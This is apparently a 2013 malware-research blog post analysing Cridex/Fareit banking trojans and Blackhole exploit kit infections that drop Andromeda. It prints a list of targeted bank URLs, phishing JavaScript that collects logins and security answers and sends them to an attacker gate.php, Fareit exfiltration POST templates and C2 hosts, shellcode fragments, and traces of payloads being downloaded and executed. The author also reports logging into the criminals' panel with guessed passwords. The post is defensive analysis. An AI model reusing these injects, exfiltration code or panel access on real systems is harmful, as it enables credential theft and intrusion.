<url ...">^https://.*firstcitizens\.com/</url>
<url ...">^https://(bolb\-(west|east)|www)\.associatedbank\.com/</url>
<url ...">^https://.*secure\.fundsxpress\.com/</url>
<url ...">^https://usgateway\d*\.rbs\.com/</url>
<url ...">^https://(www\.|)svbconnect\.com/</url>
<url ...">^https?://(www\d*\.|)(ntrs|northerntrust)\.com/</url>
<url ...">^https://cib\.bankofthewest\.com/</url>
<url ...">^https://.+\.unionbank\.com/</url>
<url ...">^https://webbankingforbusiness\.mandtbank\.com/</url>
<url ...">^https://ifxmanager\.bnymellon\.com/</url>
<url ...">^https://(ecash\.|.+/cashman/)</url>
<url ...">^https://banking\.calbanktrust\.com/</url>
<url ...">^https://.+/(wcmfd/wcmpw|phcp/servlet)/</url>
<url ...">^https://(www\.|)efirstbank\.com/</url>
<url ...">^https://singlepoint\.usbank\.com/</url>
<url ...">^https://business-eb\.ibanking-services\.com/</url>
<url ...">^https://www8\.comerica\.com/</url>
<url ...">^https://.+\.53\.com/</url>
<url ...">^https://businessonline\.tdbank\.com/</url>
<url ...">^https://treas-mgt\.frostbank\.com/</url>
<url ...">^https://.+\.huntington\.com/</url>
<url ...">^https://businessaccess\.citibank\.citigroup\.com/</url>
<url ...">^https://.+/cmserver/</url>
<url ...">^https://cashmanager\.mizuhoe-treasurer.com/</url>
<url ...">^https://wellsoffice\.wellsfargo\.com/</url>
<url ...">^https://.+/onlineserv/CM/</url>
<url ...">^https://.+/ebc_ebc1961/</url>
<url ...">^https://(www\.|)sterlingwires\.com/</url>
<url ...">^https://(www\.|)treasury\.pncbank\.com/</url>
<url ...">^https://securentrycorp\.</url>
<url ...">^https://.*ebanking-services\.com/</url>
<url ...">^https://bnycash\.bankofny\.com/</url>
<url ...">^https://(.+\.web\-access|webinfocus\.mandtbank)\.com/</url>
<url ...">^https://.*businessmanager\.com/</url>
<url ...">^https://businessportal\.mibank\.com</url>
<url ...">^https://.+/Common/SignOn/</url>
<url ...">^https://commercial\.wachovia\.com/Online/Financial/Business/</url>
<url ...">^https://.+\.blilk\.com/</url>
<url ...">^https://webcmpr\.bancopopular\.com/K1/</url>
<url ...">^https://trz\.tranzact\.org/</url>
<url ...">^https://.+\.tdcommercialbanking\.com/</url>
<url ...">^https://.+\.ffinonline\.com/</url>
<url ...">^https?://(www\.|)ffbtexas\.com/</url>
<url ...">^https?://.+\.bancosabadellmiami\.com/</url>
<url ...">^https://server\d+\.cey-ebanking\.com/CLKCCM/</url>
<url ...">^https://.+\.ffrontier\.com/</url>
<url ...">^https://.+\.rbsm\.com/</url>
<url ...">^https://.+\.firstmerit</url>
<url ...">^https://.+\.fcsolb\.com</url>
<url ...">^https://cs\.directnet\.com</url>
<url ...">^https://.+\.bankofcyprus\.com/</url>
<url ...">^https://www\.hellenicnetbanking\.com/</url>
<url ...">^https://www\.e\-moneyger\.com/</url>
<url ...">^https://.+\.anzdirect\.co\.nz/online/</url>
<url ...">^https://.+\.anz\.com/inetbank/</url>
<url ...">^https://.+\.bendigobank\.com\.au/</url>
<url ...">^https://ib\.nab\.com\.au/nabib/</url>
<url ...">^https://.+\.nabconnect\.nab\.com\.au/auth/login/</url>
<url ...">^https://.+\.commbiz\.commbank\.com\.au/</url>
<url ...">^https://compassconnect\.compassbank\.com/</url>
Below is the method to redirect into phishing sites...
<replacement> <url contentType="^text/(html|plain)">^h00ps://direct.53・com/</url>
META HTTP-EQUIV="Refresh" CONTENT="0; URL=h00ps://express.53.com/express/logon・jsp
Also aiming specific url accessed....
<url ...><![CDATA[^h00ps://online\(.)americanexpress\(.)com/myca/.*?request_type=authreg_acctAccountSummary]]>
<url ...>h00ps://businessaccess\(.)citibank\.citigroup(.)com/cbusol/signon\.do</url>
You can contact me to see the config data extracted.

Phishing

You'll see these phishing codes....
var info = encodeURIComponent('Login='+$('input#EmployerLogin1_cbsys_login_email').
val()+"\n"+'Password='+$('input#EmployerLogin1_cbsys_login_password').
val()+"\n"+$('input[name=q1]').
val()+'='+$('input[name=a1]').
val()+"\n"+$('input[name=q2]').
val()+'='+$('input[name=a2]').
val()+"\n"+$('input[name=q3]').
val()+'='+$('input[name=a3]').
Some trails on the phishing forms.. Related to the phishing form there's a code for credit card fake processing..
function check_cc(cardnumber) {
var cardNo = cardnumber.replace(/[^0-9]/g, "");
if (cardNo.length 16) {
return false;
}
var checksum = 0;
var j = 1;
var calc;
for (i = cardNo.length - 1; i >= 0; i--) {
calc = Number(cardNo.charAt(i)) * j;
if (calc > 9) {
checksum = checksum + 1;
calc = calc - 10;
}
checksum = checksum + calc;
if (j == 1) {
j = 2;
} else {
j = 1;
}

if (checksum % 10 != 0) {
return false;

return true; }

What Software's Credential is Accessed?

Morever in memory, was found trailing path of credential detection:
 Common AppData
My Pictures
Common Documents
Common Administrative Tools
Administrative Tools
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
explorer.exe
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
Password
HostName
User
:(etc)
With the complete list -->>[PASTEBIN]You'll see list of most of the softwares used internet using username and passwords were aimed; i.e.: Browsers, intranet tools, FTP, Plugins, and ..Mailer(POP/SMTP/IMAP).

How Trojan Fareit Sent the Credentials?

How this credentials sent? In binary I detected HTTP POST method coded below:
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: %lu
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
To the remote hosts below:
h00p://132.248.49.112:8080/asp/intro.php
h00p://113.130.65.77:8080/asp/intro.php
h00p://203.113.98.131:8080/asp/intro.php
h00p://110.164.58.250:8080/asp/intro.php
h00p://200.108.18.158:8080/asp/intro.php
h00p://207.182.144.115:8080/asp/intro.php
h00p://148.208.216.70:8080/asp/intro.php
h00p://203.172.252.26:8080/asp/intro.php
h00p://202.6.120.103:8080/asp/intro.php
h00p://203.146.208.180:8080/asp/intro.php
h00p://207.126.57.208:8080/asp/intro.php
h00p://203.80.16.81:8080/asp/intro.php
h00p://202.180.221.186:8080/asp/intro.php
With the PoC I detected below: Be noted the usage of below USER-AGENT:
Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

The Control and Center Trails

It has the trail of Admin Panel for the Bad Actors to access.
var adminPanelLocation = 'h00p://62.76.177.123/if_Career/';
Which was used to send the phished information with formula below:
var d = adminPanelLocation + 'gate.php?done=1&bid=%YOUR-PC-NAME%&info='+info+'&rkey=' + Math['random']();
var d = adminPanelLocation + 'gate.php?bid=%YOUR-PC-NAME%&location='+encodeURIComponent(window.location)+'&rkey=' + Math['random']();
In the memory found the large combination of passwords for this panel, I posted some to the VT comment yesterday:
phpbb      asdf       qazwsx   iloveyou   jordan     pokemon
qwerty soccer happy shadow faith iloveyo
jesus superman matrix christ summer mustang
abc123 michael pass sunshine ashley helpme
letmein cheese aaaaaa master buster justin
test internet amanda computer heaven jasmine
love joshua nothing princess pepper orange
password1 fuckyou ginger tigger hunter testing
hello blessed mother football lovely apple
monkey baseball snoopy angel andrew michell
dragon starwars jessica jesus1 thomas peace
trustno1 purple welcome whatever angels secret
freedom charlie grace killer daniel william
jennifer :
Frankly, yesterday I happened to test accessed the site with some of the passwords and it worked, but today it looks like closed..

Research Materials

Here's the samples -->>[MEDIAFIRE]Please contact me via Twitter by mentioned to @MalwareMustDie for the research data.

Additional: New Infector of dfudont.ru:8080

@unixfreaxjp /malware]$ date Fri Jan 18 13:44:56 JST 2013

BHEK Landing page/PluginDetect

Downloads:
--10:58:57--  
h00p://dfudont.ru:8080/forum/links/column.php
=> `column.php'
Resolving dfudont.ru... 89.111.176.125, 91.224.135.20, 212.112.207.15
Connecting to dfudont.ru|89.111.176.125|:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ ] 117,545 70.64K/s
10:59:01 (70.51 KB/s) - `column.php' saved [117545]
Obfuscated version landing page: The deobfuscated version is here -->>[HERE]

Some Changes in dfudont.ru:8080 infection

New shellcode in plugin detect:
function getShellCode(){
var a = "
8282!%5154!%O415!%94eO!%a451!%eOa4!%9134!%c451!%74eO!%2191!%9124!%9121!%21b1!%9134!%3421!%
2191!%b1b1!%a121!%21b1!%9154!%3421!%2191!%a1e5!%d451!%eOO5!%b1b1!%1421!%2191!%9114!%6421!%
2191!%b181!%e451!%71a4!%O485!%6O85!%5464!%44d5!%b474!%b57O!%6434!%4414!%547O!%a5d5!%e474!%
817O!%81O1!%21O1!%a5d5!%c56O!%7464!%d5c4!%c4e4!%7O7O!%8521!%c5c5!%85O4!%237O!%15e1!%eee6!%
:
583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%Ofb2!%423a!%c7cO!%4c7d!%5ae6!%4236!%e43a!%b25f!%
67cO!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c5O2!%O1ad!%6983!%3f72!%deb1!%58b2!%964d!%
1e16!%ddb1!%8Ob2!%3ae5!%dde7!%O5b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%cOda!%fac1!%
d53d!%11e2!%bee6!%8681!%O93a!%7d7d!%d383!%9a6c!%b14O!%b2c5!%6741!%e43a!%b13f!%e5O2!%e73a!%
8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%5O8e!%afbe!%O42e!%O382!%
efO8!%9eeO!%6618!%139c!%O185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join(""
Some new modification, jar/java callback functions were spotted in PluginDetect:
function getBlockSize(){
return 1024}
function getAllocSize(){
return 1024 * 1024}
function getAllocCount(){
return 300}
function getFillBytes(){
var a = '%u' + '0c0c';
return a + a}
A changes eventually also detected only in JARs too: First & second JAR during download (snipped log)
--11:01:49--  h00p://dfudont.ru:8080/forum/links/column.php
=> `column.php.1'
Resolving dfudont.ru... seconds 0.00, 89.111.176.125, 91.224.135.20, 212.112.207.15
Caching dfudont.ru => 89.111.176.125 91.224.135.20 212.112.207.15
Connecting to dfudont.ru|89.111.176.125|:8080... seconds 0.00, connected.
:
GET /forum/links/column.php HTTP/1.0 (older java request)
Host: dfudont.ru:8080
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Fri, 18 Jan 2013 02:01:44 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 16830
ETag: "571e4f2c6881ced7067423592c3a9958"
Last-Modified: Fri, 18 Jan 2013 02:01:44 GMT
Accept-Ranges: bytes
:
200 OK
Length: 16,830 (16K) [application/java-archive]
11:01:51 (31.60 KB/s) - `try1.jar' saved [16830/16830]

GET /forum/links/column.php HTTP/1.0 (newer java request)
Host: dfudont.ru:8080
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Fri, 18 Jan 2013 02:08:09 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 22824
ETag: "1bfec3a52c1b19ee4aaaba0be551c1f1"
Last-Modified: Fri, 18 Jan 2013 02:02:52 GMT
Accept-Ranges: bytes
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 22,824 (22K) [application/java-archive]
11:02:59 (35.13 KB/s) - `try2.jar' saved [22824/22824]
Both jars are having same previous exploit codes, in try1.jar was detected new obfuscation only: while in (ex-)0day jar/try2.jar was the MD5 changes: New changed sample's Detection Ratio in VT:[Landing Page][JAR1][JAR2]

How about the payload?

It is the same as the original post wrote :-) Cridex that dropped Fareit. PoC, translated API of shellcode shows URL:
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://dfudont.ru:8080/forum/links/column.php?bf=30:1n:1i:1i:33&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&d=1k&bb=a&hy=m, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
Download logs (snipped):
   :
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Fri, 18 Jan 2013 04:35:44 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Fri, 18 Jan 2013 04:35:44 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 197632
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 197,632 (193K) [application/x-msdownload]
100%[====================================>] 197,632 71.52K/s
13:35:53 (71.40 KB/s) - `calc.exe' saved [197632/197632]
The file:
@unixfreaxjp /malware]$ ls -alF info.exe ; md5 info.exe
-rwxr--r-- 1 MMD toor 197632 Jan 17 01:28 info.exe*
MD5 (info.exe) = f188879d2cc11dae25c6368cd2f4ad96
I guess these moronz didn't have enough time to make new payload, eh? :-) Tick.. tock.. tick.. tock...

Samples

For the research/education about malware & to increase detection rates - we are sharing the samples here -->>[MEDIAFIRE]
#MalwareMustDie!!

A case of "Buggy Ransomware" with Backdoor, Spyware (is an Andromeda + Botnet CnC) Infection via Apache's Blackhole Exploit Kit

$
0
0

Background

I was contacted by a fellow researcher friend @StopMalvertisin to take a look into an infection of the double trojan downloading a Ransomware which MO of faking Java 7u11 written in the Stop Malvertising report here -->>[Link]. The report is well-explaining the native of the infection, so I guess what's left for me to do next is checking what's under the hood. I'll try to explain in a simple detail as possible. Please bear with my english, here we go:


The infector


Following the hinted url, I tried to access it.. and was ending up like this:

Good, the moronz was really made me so "happy" so in some minutes I flushed them:

and also exposed the flushed payloads in twitter here:
(See↓ how the detection ratio was very low)

If you follow our guide published in here -->>[GUIDE] and
our previous posts then you will have no problem w/getting same samples.
So let's see the log to learn why we failed in the first run.. :-)
URL: h00p://digitalcurrencyreport.com/cybercrime-suspect-arrested
Resolving digitalcurrencyreport.com... seconds 0.00, 109.163.230.125
Caching digitalcurrencyreport.com => 109.163.230.125
Connecting to digitalcurrencyreport.com|109.163.230.125|:80... seconds 0.00, connected.
GET /cybercrime-suspect-arrested HTTP/1.0
Host: digitalcurrencyreport.com
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK "
Server: nginx admin
Date: Sat, 19 Jan 2013 06:57:46 GMT
Content-Type: text/html
Content-Length: 73
Connection: keep-alive
Last-Modified: Fri, 18 Jan 2013 04:23:17 GMT
Accept-Ranges: bytes
X-Cache: HIT from Backend "
:
200 OK (etc)
200 w/bad response means you have to reach a "right" parameter/page, I don't think I made mistake with my params so is a matter of path/page.. After preparing bruter data for infector page names, tried the index pages 1st, and shortly hit the jackpot... was the server's root, LOL (lesson number one, better making sure if your target is still fresh !)
GET / HTTP/1.0
User-Agent: MalwareMustDie to Moronz: Thou salt not insult my beloved Mom!
Host: digitalcurrencyreport.com
HTTP request sent, awaiting response...
: "
HTTP/1.1 200 OK
Server: nginx admin
Date: Sat, 19 Jan 2013 07:25:57 GMT
Content-Type: text/html
Content-Length: 990
Connection: keep-alive
Last-Modified: Wed, 16 Jan 2013 02:42:01 GMT
Accept-Ranges: bytes
X-Cache: HIT from Backend
200 OK
Length: 990 [text/html]
16:26:06 (28.16 MB/s) - `index.html' saved [990/990] "
the code inside:
  :
<title>ERROR: The requested URL could not be retrieved</title>
<meta http-equiv="refresh" content="3;url=/cybercrime-suspect-arrested/">
</head><body><iframe src='h00p://mongif・biz/assumed/timing_borrows.php' width=1 height=1 style='visibility:hidden;'></iframe>
<h1>ERROR</h1>
So, hello landing page, let's play, 1st fetched it:
Resolving mongif.biz... seconds 0.00, 46.166.169.179
Caching mongif.biz => 46.166.169.179
Connecting to mongif.biz|46.166.169.179|:80... seconds 0.00, connected.
GET /assumed/timing_borrows.php HTTP/1.0
User-Agent: MalwareMustDie to Moronz: Thou salt not insult a crusader!
Host: mongif.biz
HTTP request sent, awaiting response...
: "
HTTP/1.1 200 OK
Date: Sat, 19 Jan 2013 07:33:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Connection: close
Content-Type: text/html; charset=UTF-8
200 OK
Length: unspecified [text/html]
16:33:37 (98.14 KB/s) - `timing_borrows.php' saved [119372] "
↑now we have Apache/2.2.3 (CentOS) + PHP/5.3.20 serving landing page.. What's the exploit kit? Snipped the landing page code with $ top:
<html><head><title></title></head><body>
<applet code="hw" archive="/assumed/timing_borrows.php?ynafkyuv=tvmamz&vqew=fbu">
<param name="prime" value="" />
<param name="val" value="Dyy3Ojj0toA8.w?8UjViiK0eMjy808oAN?tllt_..
<div></div><script>function c(){if(window・document)s+=String.fromCharCode(a[i])..
<script>var a = "!!8:97:!!4:32:80:!08:!!7:!03:!05:!!0:68:!0!:!!6:!0!:99:!!6:6!:!23:!..
!6:!2!:!!2:!0!:!!!:!02:32:98:6!:6!:34:!02:!!7:!!0:99:!!6:!05:!!!:!!0:34:!25:44:!05:!!5..
98:4!:63:40:!00:46:!05:!!5:68:!0!:!02:!05:!!0:!0!:!00:40:99:4!:63:!!0:!0!:!!9:32:82:!0..
3:!20:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:77:97:!!6:!04:46:!09:!05:!!0:40:99:46:!08..
:48:34:93:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:52:59:97:43:43:4!:!23:!05:!02:40:47:9..
:!!5:93:47:46:!!6:!0!:!!5:!!6:40:!00:9!:98:93:4!:4!:!23:!02:6!:!!0:97:!!8:!05:!03:97:!..
0:97:46:!08:!0!:!!0:!03:!!6:!04:59:!02:43:43:4!:!23:!09:6!:97:9!:!02:93:46:!00:!0!:!!5..
:
Yes, friend, at this time I know is a blackhole. Shortly, I decoded it here -->>[PASTEBIN]To find the infection components are as per below download urls:
// The JARs are here:
// Use the applet in landing page & fetched two jars:
URL: "h00p://mongif.biz/assumed/timing_borrows.php"
HTTP/1.1 200 OK
Date: Sat, 19 Jan 2013 07:29:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Content-Length: 22568
ETag: e96e7e45516383c129d8bfabe0ce7a15
Last-Modified: Sat, 19 Jan 2013 07:29:23 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: application/java-archive
200 OK
16:29:32 (58.72 KB/s) - try1.jar saved [22568/22568]
:
HTTP/1.1 200 OK
Date: Sat, 19 Jan 2013 07:31:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Content-Length: 16532
ETag: ea880b47daef50875ebe70c2fb427017
Last-Modified: Sat, 19 Jan 2013 07:31:56 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: application/java-archive
200 OK
Length: 16,532 (16K) [application/java-archive]
16:32:04 (50.54 KB/s) - try2.jar saved [16532/16532]

The PDFs are here: "
h00p://mongif.biz/assumed/timing_borrows.php?wkqavggu=30:1n:1i:1i:33&pqu=30:2v:3h&mblwxwdx=1m:33:1n:30:1g:1o:1i:1l:2w:33:1p:1p:1l:31:1k:30:1g:1f:1i:1l:1f:1g&ludkpgbm=1k:1d:1f:1d:1g:1d:1f
h00p://mongif.biz/assumed/timing_borrows.php?ggtmfzl=30:1n:1i:1i:33&lddsvzbu=3f&pznkfzh=1m:33:1n:30:1g:1o:1i:1l:2w:33:1p:1p:1l:31:1k:30:1g:1f:1i:1l:1f:1g&wnq=1k:1d:1f:1d:1g:1d:1f"

The SWF are here: "
h00p://mongif.biz/assumed/timing_borrows.php?jdp=30:1n:1i:1i:33&chjlohkh=31:31:3c:3j:2v&npbua=1m:33:1n:30:1g:1o:1i:1l:2w:33:1p:1p:1l:31:1k:30:1g:1f:1i:1l:1f:1g&ublfosyz=xchadllm
h00p://mongif.biz/assumed/timing_borrows.php?nsxojsu=30:1n:1i:1i:33&uflnpv=34:30:3n:35&qtpzz=1m:33:1n:30:1g:1o:1i:1l:2w:33:1p:1p:1l:31:1k:30:1g:1f:1i:1l:1f:1g&nyt=clxndipk"
↑NOTED, the path of this BHEK serve the infector. Below is the detection ratio of these exploit infectors in VT: Here -->[LandingPage][JAR1][JAR2][PDF1][PDF2][SWF1][SWF2](I wrote comment of WHICH exploit CVE used in each file in VT comment page) Most of these file exploit infectors are usually ones found in Blackhole EK, except one of the PDF infector is a bit special, it contains 4(four) CVE infector, actually I tweeted it here, see the VT comment for CVE code:

Double Hit infection

So here's the point. I noticed the shellcode in landing page & in PDF is longer than usual. Landing page's (PluginDetect 0.7.9 used, at shellcode function): ↑Contains two urls of the payload download to be executed by the API below:
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255) 1
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon) 0x1a400000
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://mongif.biz/assumed/timing_borrows.php?ff=30:1n:1i:1i:33&se=1m:33:1n:30:1g:1o:1i:1l:2w:33&w=1k&xe=w&qj=v, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://mongif.biz/assumed/timing_borrows.php?nf=30:1n:1i:1i:33&qe=1l:31:1k:30:1g:1f:1i:1l:1f:1g&m=1k&hc=e&sf=z, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt1.dll) 0
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt1.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt1.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
You'll see the DOUBLE payload url in there↑ This shellcode is actually called & executed by SWF & JAR in post exploitation. The PDFs have their own way, in one PDF with 4 CVE exploiter we found below string: If you save it as binary and see it in ASCII then swap per 2 bits, in the end of the strings you'll see a double payload download url too: In another PDF you'll see the code below after you decoding its obfuscation: ↑the form of the two payload download urls in above picture is self explanatory :-)

Payloads

Payloads are in the Exploit Kit server as per URL mentioned API above. However, they made callbacks the CnC server in the different location. I won't write how I fetched the payloads, pls see previous posts/guide. But below is the download log as the evidence of this crime:
//first payload..

HTTP/1.1 200 OK
Date: Sat, 19 Jan 2013 07:43:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Pragma: public
Expires: Sat, 19 Jan 2013 07:43:56 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private "
Content-Disposition: attachment; filename=’calc.exe’
Content-Transfer-Encoding: binary
Content-Length: 80384
Connection: close
Content-Type: application/x-msdownload
200 OK
Length: 80,384 (79K) [application/x-msdownload]
16:44:05 (93.77 KB/s) - `calc.exe' saved [80384/80384] "

// second payload..

HTTP/1.1 200 OK
Date: Sat, 19 Jan 2013 07:44:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Pragma: public
Expires: Sat, 19 Jan 2013 07:44:36 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private "
Content-Disposition: attachment; filename=’info.exe’
Content-Transfer-Encoding: binary
Content-Length: 30208
Connection: close
Content-Type: application/x-msdownload
200 OK
Length: 30,208 (30K) [application/x-msdownload]
16:44:45 (129.68 KB/s) - `info.exe' saved [30208/30208] "
Below is the detection ratio of these payloads in VT: [info.exe][calc.exe]You'll see↑ how poor the detection ratio of these samples.

What are these payloads?

Because is just too long, I can't go to details of my analysis for binaries. But I will write the infection flow step by step based on behavior analysis data of what these payloads do, with pictures, per sample. So you'll get the picture of what the payloads is actually do, better than a bunch of codes.. It wasn't an easy task (actually execution speed was so fast) so I did my best: info.exe info.exe is a malware classified by the name of Win32/Andromeda(aka Gamarue). A type of malware that is famous w/spyware, backdoor, stealer & downloader function. Andromeda botnet is one of popular crimeware, in this case Blackhole is used to distribute its trojan sets with the double infection. info.exe is in charge on backdoor function, while calc.exe is the botnet trojan. You'll find the good reference of these trojans here -->>[Ref]For Andromeda Botnet these are good 2 good references -->>[HERE]->>[HERE] Back to our case : This file will self copied itself into C:\Documents and Settings\All Users\ with the filename of svchost.exe, API used:
PID: 3140 [PATH]\info.exe ADDR: 0x85017a 
CopyFileA(lpExistingFileName: "[PATH]\info.exe",
lpNewFileName: "C:\Documents and Settings\All Users\svchost.exe",
bFailIfExists: 0x0)
During execution it also injects another process in memory: PoC, see the parent PID: The info.exe was opening TCP/IP 0.0.0.0 & listening to port 8000 as a daemon... At this time in the memory also detected the TCP traces:
00000001858F   MSAFD Tcpip [TCP/IP]
0000000011CE wshtcpip.pdb
000000018AE3 \Registry\Machine\System\CurrentControlSet\Services\Tcp\VParameters
000000018B2B \Registry\Machine\System\CurrentControlSet\Services\Tcp\Parameters
000000018B73 \Registry\Machine\System\CurrentControlSet\Services\Tcpip\Parameters
000000000C9A C:\WINDOWS\system32\wshtcpip.dll
00000002C093 MSAFD Tcpip [TCP/IP]
00000002C307 MSAFD Tcpip [UDP/IP]
00000002C57B MSAFD Tcpip [RAW/IP]
000000018A33 Tcpip
info.exe stays idle like that, below is the stacks info (see the idle part) In registry was recorded autorun + malicious setting of Internet Cache, please NOTED the faking of "Run\SunJavaUpdateSched" used↓
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched: "C:\Documents and Settings\All Users\svchost.exe"

HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013012020130121\CachePath: "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012013012020130121\"
In the memory I saw the strings related to the info.exe of above operation, With NOTED the Virtual machine detection + JavaUp(date) strings. Moreover the usage of crypto:
0x00D0E7   SOFTWARE\Microsoft\Cryptography\Defaults\Provider\
0x00D357 SOFTWARE\Microsoft\Cryptography\Providers\Type
0x00D387 SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type
0x00E047 SOFTWARE\Microsoft\Cryptography\Defaults\Provider
0x00E07F SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types
And my TestPC user's variable sets are all loaded up too:
0x02CEBD   ALLUSERSPROFILE=C:\Documents and Settings\All Users
0x02CF25 APPDATA=C:\Documents and Settings\%%USER\Application Data
0x02CF93 CommonProgramFiles=C:\Program Files\Common Files
0x02CFF5 COMPUTERNAME=%USER%-1379CF37C25
0x02D02F ComSpec=C:\WINDOWS\system32\cmd.exe
0x02D077 FP_NO_HOST_CHECK=NO
0x02D09F HOMEDRIVE=C:
0x02D0B9 HOMEPATH=\Documents and Settings\%USER%
0x02D103 LOGONSERVER=\\%USER%-1379CF37C25
0x02D13F NUMBER_OF_PROCESSORS=1
0x02D16D OS=Windows_NT
0x02D189 Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
0x02D203 PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
0x02D275 PROCESSOR_ARCHITECTURE=x86
0x02D2AB PROCESSOR_IDENTIFIER=x86 Family 6 Model 13 Stepping 6, GenuineIntel
0x02D333 PROCESSOR_LEVEL=6
0x02D357 PROCESSOR_REVISION=0d06
0x02D387 ProgramFiles=C:\Program Files
0x02D3C3 SESSIONNAME=Console
0x02D3EB SystemDrive=C:
0x02D409 SystemRoot=C:\WINDOWS
0x02D435 TEMP=C:\DOCUME~1\%USER%\LOCALS~1\Temp
0x02D47B TMP=C:\DOCUME~1\%USER%\LOCALS~1\Temp
0x02D4BF USERDOMAIN=%USER%-1379CF37C25
0x02D4F5 USERNAME=%USER%
0x02D50F USERPROFILE=C:\Documents and Settings\%USER%
0x02D563 windir=C:\WINDOWS
For the sharing analysis purpose: More memory textual data of info.exe (Trojan/Andromeda) -->>[Download]The memory dump of Trojan/Andromeda info.exe is here-->>[PASTEBIN]calc.exe calc.exe is actually a botnet component of Andromeda trojan, this one does the communication to the CnC and download servers, I am sure this one is responsible for the download of other malwares like the Ransomware in StopMalwaretising case. Upon executed it also doing the self-copied with self-deleted:
